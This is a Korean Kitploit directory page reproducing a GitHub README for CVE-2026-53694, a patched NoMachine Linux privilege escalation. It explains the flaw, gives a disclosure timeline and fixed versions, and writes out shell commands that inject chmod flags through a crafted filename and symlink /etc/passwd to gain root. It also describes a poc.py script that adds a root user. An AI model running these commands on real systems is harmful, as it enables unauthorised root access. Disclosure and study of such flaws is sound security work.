Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-53694-NoMachine-LPE — CVE-2026-53694에 대한 개념 증명 익스플로잇 및 분석서로, Linux용 NoMachine에서 nxchmod.sh의 인수 삽입을 통한 로컬 권한 상승으로 심볼릭 링크 조작을 통해 루트 액세스를 가능하게 합니다. | Kitploit
도구/GitHubGitHub/do4choo/cve-2026-53694-nomachine-lpe
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHubdo4choo/cve-2026-53694-nomachine-lpe

CVE-2026-53694-NoMachine-LPE

CVE-2026-53694에 대한 개념 증명 익스플로잇 및 분석서로, Linux용 NoMachine에서 nxchmod.sh의 인수 삽입을 통한 로컬 권한 상승으로 심볼릭 링크 조작을 통해 루트 액세스를 가능하게 합니다.

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
저장소 보기
1개월 전아직 검토되지 않음

CVE-2026-53694: 인자 주입을 통한 NoMachine 로컬 권한 상승

CVE Status Target Language

개요

이 저장소는 Linux용 NoMachine의 로컬 권한 상승(LPE) 취약점인 CVE-2026-53694에 대한 설명과 개념 증명(PoC)을 포함합니다.

nxchmod.sh 스크립트에서 인자 구분자의 부적절한 처리로 인해, 로컬의 권한 없는 사용자가 root로 실행되는 시스템 명령에 인자를 주입할 수 있습니다. 이 인자 주입과 심볼릭 링크를 결합하여 공격자는 중요한 시스템 파일(예: /etc/passwd)을 덮어쓰고 권한을 root로 상승시킬 수 있습니다.

이 취약점은 공급업체에 의해 완전히 패치되었습니다.

발견 과정

이 취약점을 발견한 것은 시행착오와 늦은 밤의 깨달음이었습니다. 다음은 발견 과정입니다:

  1. 대상 관찰: /usr/NX/scripts/restricted/nxchmod.sh 스크립트가 특정 디렉터리의 권한을 관리하기 위해 root 사용자에 의해 주기적으로 실행되는 것을 발견했습니다.
  2. 초기 아이디어 (막다른 골목): 스크립트가 파일에 chmod a+rw를 적용하는 것을 보았습니다. '내가 대상을 제어한다면, 심볼릭 링크를 사용하여 /etc/passwd를 쓰기 가능하게 만들 수 있을까?'라고 생각했습니다. 표준 심볼릭 링크(ln -s /etc/passwd /tmp/asdf)를 테스트했지만 실패했습니다. /tmp와 같은 디렉터리의 Linux 스티키 비트는 root 사용자가 다른 사용자가 만든 심볼릭 링크를 무작정 따르지 못하게 합니다.
  3. 돌파구: 나중에 스크립트 실행을 검토하면서 명령이 어떻게 구성되는지 확인했습니다: ${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}. 스크립트는 리터럴 파일 이름을 가져와 chmod에 직접 전달하고 있었습니다.
  4. 파일 이름을 통한 명령 주입: 파일 이름에 공백과 플래그를 포함한 파일을 생성할 수 있다는 것을 깨달았습니다. X1234 -R -L이라는 이름의 파일을 만들었습니다. 스크립트가 실행될 때 chmod 명령은 이것을 단일 파일 경로가 아닌 인자로 확장했습니다.
  5. 스티키 비트 우회: 파일 이름을 통해 chmod 명령에 -L (심볼릭 링크 따르기) 및 -R (재귀) 플래그를 주입함으로써, chmod 바이너리 자체가 해당 디렉터리에 내가 만든 심볼릭 링크를 확인하고 따르도록 강제하여 스티키 비트 보호를 완전히 우회했습니다.
  6. LPE 달성: /etc/passwd가 쓰기 가능(a+rw)이 되면, 파일에 새로운 root 사용자를 추가하고 su를 통해 로그인할 수 있었습니다.

기술적 분석

취약점은 NoMachine이 X11/Wayland 소켓에 대한 권한을 처리하는 방식에서 비롯됩니다. nxchmod.sh 스크립트는 root로 실행되는 nxserver.bin 데몬에 의해 생성됩니다.

취약한 실행은 다음과 같습니다:

root@kitploit:~
# /usr/NX/scripts/restricted/nxchmod.sh
${COMMAND_CHMOD} ${MOD_STRING} ${FILE_PATH}

공격자가 디렉터리 구조와 X1234 -R -L이라는 파일을 생성하면, root가 실행하는 명령은 다음과 같습니다: /bin/chmod a+rw /tmp/.X11-unix/X1234 -R -L

X1234 디렉터리 안에 /etc/passwd를 가리키는 심볼릭 링크를 배치하면, 주입된 -R 및 -L 인자가 chmod로 하여금 심볼릭 링크를 재귀적으로 따르도록 강제하여 대상 파일에 전역 읽기/쓰기 권한을 부여합니다.

악용 요구 사항

이 익스플로잇이 작동하려면 대상 시스템이 다음 조건을 충족해야 합니다:

  • 운영 체제가 Wayland를 사용해야 합니다 (X11 아님).
  • Xwayland가 활성화되어 있어야 합니다.
  • 그래픽 세션이 실행 중이어야 합니다 (로그인 화면으로 충분함).

개념 증명

이 취약점은 셸 명령을 사용하여 수동으로, 또는 제공된 Python 스크립트를 사용하여 자동으로 재현할 수 있습니다.

방법 1: 수동 실행 (셸)

/tmp/.X11-unix/로 이동하여 다음 명령을 실행하여 악의적인 디렉터리 구조를 만드세요.

root@kitploit:~
cd /tmp/.X11-unix/

# 1. 악용 설정
touch "X1234 -R -L"
mkdir X1234
ln -s /etc/passwd /tmp/.X11-unix/X1234/pwn

# nxchmod.sh가 실행될 때까지 기다립니다 (최대 60초 소요 가능).
# /etc/passwd의 권한이 -rw-rw-rw-로 변경되었는지 확인합니다.
# 이제 /etc/passwd를 편집하여 root 사용자를 추가할 수 있습니다.

취약점을 확인하고 권한을 상승시킨 후, 시스템 안정성을 복원하고 아티팩트를 제거하려면 다음 정리 명령을 실행하세요:

root@kitploit:~
# 2. 정리
rm "X1234 -R -L"
unlink X1234/pwn
rmdir X1234
chmod 644 /etc/passwd

방법 2: 자동화된 익스플로잇

전체 자동화된 익스플로잇이 poc.py에 제공됩니다. 이 스크립트는 Wayland 요구 사항을 확인하고, 심볼릭 링크를 설정하며, nxchmod.sh 실행 주기를 기다린 후 새로운 root 사용자(gg)를 /etc/passwd에 주입합니다.

익스플로잇을 실행하려면:

root@kitploit:~
python3 poc.py

수정 사항

이 취약점은 NoMachine에 의해 해결되었습니다. 사용자는 다음 버전 이상으로 업데이트해야 합니다:

  • NoMachine 9.5.7
  • NoMachine 8.23.2

타임라인

  • 2026-04-20: 취약점을 공급업체에 보고.
  • 2026-04-23: 공급업체가 취약점을 확인하고 조정된 공개에 동의.
  • 2026-05-07: 공급업체가 패치된 버전(9.5.7 및 8.23.2)을 출시하고 문제 보고 TR04X11802를 게시.
  • 2026-06-10: CVE-2026-53694가 NVD에 게시됨. (공식 MITRE 기록은 현재 전체 분석 및 크레딧 업데이트가 보류 중입니다 (마지막 확인: 2026-07-01))

참고 자료

  • NoMachine Trouble Report TR04X11802
  • NoMachine Software Update SU05X00274
  • NoMachine Software Update SU05X00275
  • NVD - CVE-2026-53694
도구 다운로드